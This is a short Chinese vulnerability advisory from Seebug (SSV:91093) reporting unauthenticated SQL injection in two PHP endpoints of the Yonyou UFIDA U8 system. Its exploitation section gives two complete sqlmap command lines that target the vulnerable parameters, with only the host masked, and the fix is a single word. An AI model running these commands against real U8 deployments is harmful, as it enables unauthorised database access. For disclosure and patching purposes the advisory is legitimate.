用友优普U8系统 /Server/CmxGetAppNameByUserName.php等2处 SQL注入漏洞

2016-03-19T00:00:00
ID SSV:91093
Type seebug
Reporter kikay
Modified 2016-03-19T00:00:00

Description

0x01漏洞简介

用友优普U8系统在以下2处存在SQL注入漏洞:

(1)/Server/CmxGetAppNameByUserName.php 参数User (2)/Server/CmxCS.php 参数pgid 远程攻击者无需登陆,可以利用该漏洞执行SQL指令。

0x02漏洞利用

(1)sql注入1

sqlmap.py -u "**.**.**.**:8080/Server/CmxCS.php?pgid=CS_Remove" --dbms mysql --technique T --cookie "RAS_Admin_UserInfo_UserName=1" --data "CS_ID[]=1&CS_ID[]=1" -p CS_ID

(2) sql注入2

sqlmap.py -u "**.**.**.**:8080/Server/CmxGetAppNameByUserName.php?User=1&Pass=1" --dbms mysql --technique T --cookie -p User

0x03漏洞修复

过滤。